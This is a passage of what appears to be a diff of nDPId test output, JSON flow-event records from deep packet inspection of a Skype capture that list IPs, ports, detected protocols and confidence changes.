{"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1431969713813,"flow_last_seen":1431969733946,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.185.207.12","src_port":13021,"dst_port":45493,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":279,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431969759543,"flow_last_seen":1431969759588,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.253.48.245","src_port":123,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"}} 
+00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431969642334,"flow_last_seen":1431969642400,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":183,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":58681,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00634{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":292,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1431969792778,"flow_last_seen":1431969803795,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.53.51","src_port":50146,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":292,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1431969792778,"flow_last_seen":1431969803795,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.53.51","src_port":50146,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.43","src_port":13021,"dst_port":40002,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969678448,"flow_last_seen":1431969678448,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.26","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969687504,"flow_last_seen":1431969687504,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.29","src_port":13021,"dst_port":40010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969667440,"flow_last_seen":1431969667440,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.33","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969659392,"flow_last_seen":1431969659392,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.45","src_port":13021,"dst_port":40012,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969666429,"flow_last_seen":1431969666429,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.44","src_port":13021,"dst_port":40013,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.38","src_port":13021,"dst_port":40015,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969660403,"flow_last_seen":1431969660403,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.17","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969671427,"flow_last_seen":1431969671427,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.28","src_port":13021,"dst_port":40026,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969653376,"flow_last_seen":1431969653376,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.15","src_port":13021,"dst_port":40026,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969675413,"flow_last_seen":1431969675413,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.21","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969666429,"flow_last_seen":1431969666429,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.41","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969662422,"flow_last_seen":1431969662422,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.25","src_port":13021,"dst_port":40028,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.24","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969664405,"flow_last_seen":1431969664405,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.20","src_port":13021,"dst_port":40033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.43","src_port":13021,"dst_port":40002,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969678448,"flow_last_seen":1431969678448,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.26","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969687504,"flow_last_seen":1431969687504,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.29","src_port":13021,"dst_port":40010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969667440,"flow_last_seen":1431969667440,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.33","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969659392,"flow_last_seen":1431969659392,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.45","src_port":13021,"dst_port":40012,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969666429,"flow_last_seen":1431969666429,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.44","src_port":13021,"dst_port":40013,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.38","src_port":13021,"dst_port":40015,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969660403,"flow_last_seen":1431969660403,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.17","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969671427,"flow_last_seen":1431969671427,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.28","src_port":13021,"dst_port":40026,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969653376,"flow_last_seen":1431969653376,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.15","src_port":13021,"dst_port":40026,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969675413,"flow_last_seen":1431969675413,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.21","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969666429,"flow_last_seen":1431969666429,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.41","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969662422,"flow_last_seen":1431969662422,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.25","src_port":13021,"dst_port":40028,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.24","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969664405,"flow_last_seen":1431969664405,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.20","src_port":13021,"dst_port":40033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1431969716182,"flow_last_seen":1431969728657,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":110,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.133.19.185","src_port":50122,"dst_port":44431,"l4_proto":"tcp","ndpi": 
{"proto":"Unknown","breed":"Unrated"}} 00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1431969716182,"flow_last_seen":1431969728657,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":110,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.133.19.185","src_port":50122,"dst_port":44431,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00600{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":22,"flow_first_seen":1431969717295,"flow_last_seen":1431969788791,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":7,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.133.19.185","src_port":50124,"dst_port":44431,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":22,"flow_first_seen":1431969717295,"flow_last_seen":1431969788791,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":7,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.133.19.185","src_port":50124,"dst_port":44431,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1431969713813,"flow_last_seen":1431969733946,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"176.26.55.167","src_port":13021,"dst_port":63773,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 